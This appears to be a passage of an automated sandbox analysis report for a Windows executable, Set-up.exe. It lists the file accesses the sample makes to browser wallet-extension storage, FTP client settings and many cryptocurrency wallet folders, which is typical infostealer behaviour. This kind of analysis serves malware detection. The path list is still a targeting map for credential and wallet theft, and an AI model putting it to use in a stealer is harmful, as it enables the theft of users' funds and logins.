            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcbigmjiafegjnnogedioegffbooigliJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kfdniefadaanbjodldohaedphafoffohJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflalJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibegklajigjlbljkhfpenpfoadebkoklJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdpelninpfbopdfbppfopcmoepikkgkJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\epapihdplajcdnnkdeiahlgigofloibgJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiiooljJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fpcamiejgfmmhnhbcafmnefbijblinffJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\Mozilla\Firefox\Profiles\Local StateJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ldinpeekobnhjjdofggfgjlcehhmanljJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bmikpgodpkclnkgmnpphehdgcimmidedJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hjagdglgahihloifacmhaigjnkobnnihJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kglcipoddmbniebnibibkghfijekllblJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ablbagjepecncofimgjmdpnhnfjiecfmJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gjhohodkpobnogbepojmopnaninookhjJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\apbldaphppcdfbdnnogdikheafliigcfJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnmbobjmhlngoefaiojfljckilhhlhcjJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nofkfblpeailgignhkbnapbephdnmbmnJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jngbikilcgcnfdbmnmnmnleeomffcimlJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnkJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\odbfpeeihdkbihmopkbjmoonfanlbfclJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpnJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gafhhkghbfjjkeiendhlofajokpaflmkJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\odpnjmimokcmjgojhnhfcnalnegdjmdnJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lnnnmfcpbkafcpgdilckhmhbkkbpkmidJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\eklfjjkfpbnioclagjlmklgkcfmgmbpgJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmglflngjlhgibbmcedpdabjmcmboamoJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kmhcihpebfmpgmihbkipmjlmmioamekaJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egdddjbjlcjckiejbbaneobkpgnmpknpJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\Notepadu002Bu002B\plugins\config\NppFTPJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\Estsoft\ALFTPJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\FTP NowJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\Notepadu002Bu002B\plugins\config\NppFTPJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\FTPBoxJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\Estsoft\ALFTPJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\BlazeFtpJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\Estsoft\ALFTPJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\FTPBoxJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\FTPBoxJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Local\INSoftware\NovaFTPJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\BitKinexJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTPJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\Estsoft\ALFTPJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\FTP NowJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\Notepadu002Bu002B\plugins\config\NppFTPJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Local\INSoftware\NovaFTPJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\BlazeFtpJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\GHISLERJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\GHISLERJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Program Files (x86)\GoFTP\settingsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Local\INSoftware\NovaFTPJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\FTP NowJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\Notepadu002Bu002B\plugins\config\NppFTPJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\BitKinexJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Notepadu002Bu002B\plugins\config\NppFTPJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\BlazeFtpJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\UltraFXPJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\UltraFXPJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\GHISLERJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\FTPBoxJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\UltraFXPJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\BlazeFtpJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\UltraFXPJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\FTP NowJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\BitKinexJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\BitKinexJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\FTPBoxJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\BitKinexJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\FTP NowJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\GHISLERJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Program Files (x86)\DeluxeFTPJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Local\INSoftware\NovaFTPJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\UltraFXPJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\BlazeFtpJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\INSoftware\NovaFTPJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\GHISLERJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\WalletWasabi\Client\WalletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\WalletWasabi\Client\WalletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\WalletWasabi\Client\WalletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\WalletWasabi\Client\WalletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\WalletWasabi\Client\WalletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\ArmoryJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\ArmoryJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\ArmoryJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\ArmoryJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\ArmoryJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\DashCore\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\DashCore\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\DashCore\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\DashCore\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\DashCore\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\ExodusJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\ExodusJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\ExodusJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\ExodusJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\ExodusJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\BBQCoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\BBQCoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\BBQCoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\BBQCoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\BBQCoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\MegacoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\MegacoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\MegacoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\MegacoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\MegacoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\MincoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\MincoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\MincoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\MincoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\MincoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\NamecoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\NamecoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\NamecoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\NamecoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\NamecoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\PrimecoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\PrimecoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\PrimecoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\PrimecoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\PrimecoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\TerracoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\TerracoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\TerracoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\TerracoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\TerracoinJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\Daedalus Mainnet\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\Daedalus Mainnet\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\Daedalus Mainnet\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Daedalus Mainnet\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\Daedalus Mainnet\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\All Users\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Default User\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\Public\AppData\Roaming\Ledger LiveJump to behavior
